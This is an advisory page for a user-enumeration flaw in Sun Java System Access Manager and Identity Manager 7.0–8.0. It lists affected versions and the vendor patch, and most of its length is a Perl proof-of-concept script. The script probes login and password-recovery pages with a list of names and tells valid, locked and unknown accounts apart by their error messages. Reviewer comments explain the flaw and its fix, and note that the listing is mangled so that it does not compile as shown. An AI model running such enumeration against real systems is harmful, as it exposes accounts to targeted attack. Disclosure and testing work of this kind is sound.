‘Sun Java System Identity Manager Users Enumeration’

Summary

The following exploit is a proof of concept for the user-enumeration vulnerability in Sun Java System Access Manager and Identity Manager.’

Credit:

‘The information has been provided by Marco Mella.
The original article can be found at: http://www.webalice.it/marco.mella/AboutSecurity/AboutSecurity_Advisory/Entries/2009/4/2_Sun_Java_System_Identiy_Manager_Users_enumeration.html


Details

Vulnerable Systems:
 * Sun Java System Identity Manager version 7.0
 * Sun Java System Identity Manager version 7.1
 * Sun Java System Identity Manager version 7.1.1
 * Sun Java System Identity Manager version 8.0

An unprivileged (local or remote) user may be able to determine whether a given UserId exists by examining the error messages returned by Sun Java System Identity Manager.

Impact:
A security vulnerability in Sun Java System Identity Manager allows an unprivileged user to determine whether a given UserID exists.

Vendor Solution:
23 Mar 2009 – The vendor has issued a patch (SunSolve Alert): http://sunsolve.sun.com/search/document.do?assetkey=1-66-253267-1

Exploit:
#!/usr/bin/perl -w
# POC: Sun Java Access Manager and Identity Manager Users Enumeration
# Developed for OWASP Testing guide V3
# Simple script for Sun Java access manager and Identity Manager users enumeration
#
# Author : Marco Mella <marco.mella <at> aboutsecurity.net>
# Site : www.aboutsecurity.net
#
# Copyright, 2008-2009 Marco Mella
# Sun Java System Access Manager and Sun Java System Identity Manager
# are trademarks or registered trademarks of Sun Microsystems, Inc.
#
# Last updated: 13 Jun 2008
#
# Overview: reads candidate account names one per line from the file named by
# -userfile, issues one HTTPS GET per name against the login endpoint selected
# by -switch (am: /amserver/UI/Login; idm: /idm/login.jsp, then
# /idm/questionLogin.jsp), and classifies each name by which fixed error
# string appears in the response body or <title>.  The distinguishable
# messages ("not active" / "No configuration found" / "account has been
# locked", and their IDM counterparts) are the oracle; the defensive fix is a
# single uniform failure response for unknown, inactive and locked accounts.
#
# NOTE(review): as rendered on this page the listing has typographic quotes
# (‘ ’ ”) where the original had ASCII quotes, and the backslashes of escapes
# such as \n and \t have been stripped ("nn", "ntUser").  It does not compile
# in this form; comments below describe the intended behaviour of the
# original as far as the visible text establishes it.
#
# No `use strict` / `use warnings` (only -w on the shebang): $Server, $Port,
# $Switch, $Userfile and $line are package globals.
use Getopt::Long;
use LWP::UserAgent;
# Switch.pm is a source filter and is never used below — $Switch is compared
# with `eq` — so this line could be dropped.
use Switch;
$Userfile = ”;
$line=”;

# $server/$user_file/$switch are declared but never referenced; the options
# are bound to the capitalised globals instead.
my ($server, $user_file, $switch);
my $banner = ‘Author: Marco Mella <marco.mella <at> aboutsecurity.net>n’;
my $usage= ‘Usage:n $0 -server <ip_address|host> -port <tcp port> -userfile <filename> -switch<am|idm> nn’;

# GetOptions return value ($opt) is not checked; unknown options only warn.
my $opt = GetOptions (
 ‘server=s’ => $Server,
 ‘port=s’ => $Port,
 ‘userfile=s’ => $Userfile,
 ‘switch=s’ => $Switch );
 
print ‘nnnn+———————————————————————————–+nn’;
print ‘ Sun Java Access Manager and Identity Manager User Enumeration n’;
print ‘ ‘.$banner.’n’;
print ‘+———————————————————————————–+nn’;

# All four options are mandatory; a value of "0" would also trip this test.
if ( !$Server || !$Userfile ||!$Port || !$Switch) {
 print $usage;
 
 exit(1);
 }
 
 
# --- Access Manager: probe the UI login endpoint -----------------------------
if ( $Switch eq ‘am’ ) {
 # One-arg open on a bareword handle: the filename comes from the global
 # scalar of the same name ($Userfile).  Modern style is a lexical
 # three-arg open; the die message cannot interpolate in single quotes.
 open(Userfile) or die(‘Could not open file: $Userfilenn’);
 print ‘Users enumeration Sun java System Access Managernn ‘;
 # foreach over <Userfile> slurps the whole list into memory first.
 foreach $line (<Userfile>) {
 # $line is chomped only further down, so the trailing newline is still part
 # of the query string at this point (and the name is not URL-encoded).
 my $url = ‘https://’.$Server.’:’.$Port.’/amserver/UI/Login?user=’.$line;
 # A fresh UserAgent per request: no cookie jar, no connection reuse.
 my $browser = LWP::UserAgent->new;

 my $response = $browser->get($url);
 # @headers is only used by the commented-out debug print below.
 my @headers = $response->header_field_names;
 #print ‘response headers: @headersn’;

 # Any non-2xx status aborts the whole run rather than skipping the name;
 # the classification relies on the application answering 200 with an
 # error page.
 $response->is_success or
    die ‘Failed to GET ‘$url’: ‘, $response->status_line, ‘n Aborintg’;
     
 #print $response->as_string;
chomp($line);

# Analysis of response and title of web page received
 # Body and <title> are matched against fixed substrings; the "." in
 # "locked." is an unescaped metacharacter, so it matches any character.
 if(($response->content =~ m{This user is not active} ) || ($response->title =~ m{User Inactive})) {
# print $response->content;
# print ‘nnnn’;
# print $response->title;
    print ‘ntUser: $line not validnn’}
    
  elsif (($response->content =~ m{No configuration found} ) || ($response->title =~ m{No Configuration Error})) {
    print ‘ntUser: $line yeah … Active user! nn’}
    
   elsif ($response->content =~ m{Your account has been locked.} ) {
    print ‘ntUser: $line Exist but Account has been lockednn’}
  
  else {
     print ‘ntUser: $line Active ???? Maybe you have to analizing the error message received nn’}
  }
  print ‘nn’;
  close(Userfile);
 }

# --- Identity Manager, pass 1: the login form -------------------------------
 if ( $Switch eq ‘idm’ ) {
 open(Userfile) or die(‘Could not open file: $Userfilenn’);
 print ‘Users enumeration Sun java System Identity Manager – Login Feature Analysisnn ‘;
 
 foreach $line (<Userfile>) {
 # Login attempt with an empty password; same unchomped / unencoded $line
 # caveat as in the am branch.
 my $url = ‘https://’.$Server.’:’.$Port.’/idm/login.jsp?id=&command=login&activeControl=&accountId=’.$line.’&password=’;
 my $browser = LWP::UserAgent->new;

 my $response = $browser->get($url);
 # @headers and $title are assigned but never used in this branch.
 my @headers = $response->header_field_names;
 my $title = $response->title;
 #print ‘response headers: @headersn’;

 $response->is_success or
    die ‘Failed to GET ‘$url’: ‘, $response->status_line, ‘n Aborintg’;
     
 #print $response->as_string;
 chomp($line);
 
# Analysis of response and title of web page received
 # Here only the body is inspected: "Invalid Account ID" vs "Invalid Password"
 # is the distinguishing pair.
 if($response->content =~ m{Invalid Account ID} ) {
# print $response->content;
# print ‘nnnn’;
# print $response->title;

    print ‘ntUser: $line not validnn’}
    
  elsif ($response->content =~ m{Invalid Password} ) {
    print ‘ntUser: $line yeah … Active user! nn’}
  
  elsif ($response->content =~ m{Your account has been locked.} ) {
    print ‘ntUser: $line Exist but Account has been lockednn’}
    
  else {
     print ‘ntUser: $line Active ???? Maybe you have to analizing the error message received nn’}
  }
  close(Userfile);
 }
 
 #IDM Recovery Feature
 #https://oiawf02:8081/idm/questionLogin.jsp?accountId=owasp&lang=en&cntry=US
 
# --- Identity Manager, pass 2: the password-recovery ("question") form -------
# This is a second, independent `if ($Switch eq 'idm')` block, so for -switch
# idm the list file is reopened and walked a second time.
 if ( $Switch eq ‘idm’ ) {
 open(Userfile) or die(‘Could not open file: $Userfilenn’);
 print ‘nnnnUsers enumeration Sun java System Identity Manager – Recovery Feature Analysisnn ‘;
 
 foreach $line (<Userfile>) {
 my $url = ‘https://’.$Server.’:’.$Port.’/idm/questionLogin.jsp?accountId=’.$line;
 my $browser = LWP::UserAgent->new;

 my $response = $browser->get($url);
 my @headers = $response->header_field_names;
 my $title = $response->title;
 #print ‘response headers: @headersn’;

 $response->is_success or
    die ‘Failed to GET ‘$url’: ‘, $response->status_line, ‘n Aborintg’;
     
 #print $response->as_string;
 chomp($line);
 
# Analysis of response and title of web page received
 # Recovery-form oracle: "The specified user was not found" vs "Too few user"
 # (the latter presumably the start of a longer message about security
 # questions — only this prefix is visible here).
 if($response->content =~ m{The specified user was not found} ) {
# print $response->content;
# print ‘nnnn’;
# print $response->title;

    print ‘ntUser: $line not validnn’}
    
  elsif ($response->content =~ m{Too few user} ) {
    print ‘ntUser: $line yeah … Active user! nn’}
  
  elsif ($response->content =~ m{Your account has been locked.} ) {
    print ‘ntUser: $line Exist but Account has been lockednn’}
    
  else {
     print ‘ntUser: $line Active ???? Maybe you have to analizing the error message received nn’}
  }
  print ‘nn’;
  close(Userfile);
 }’
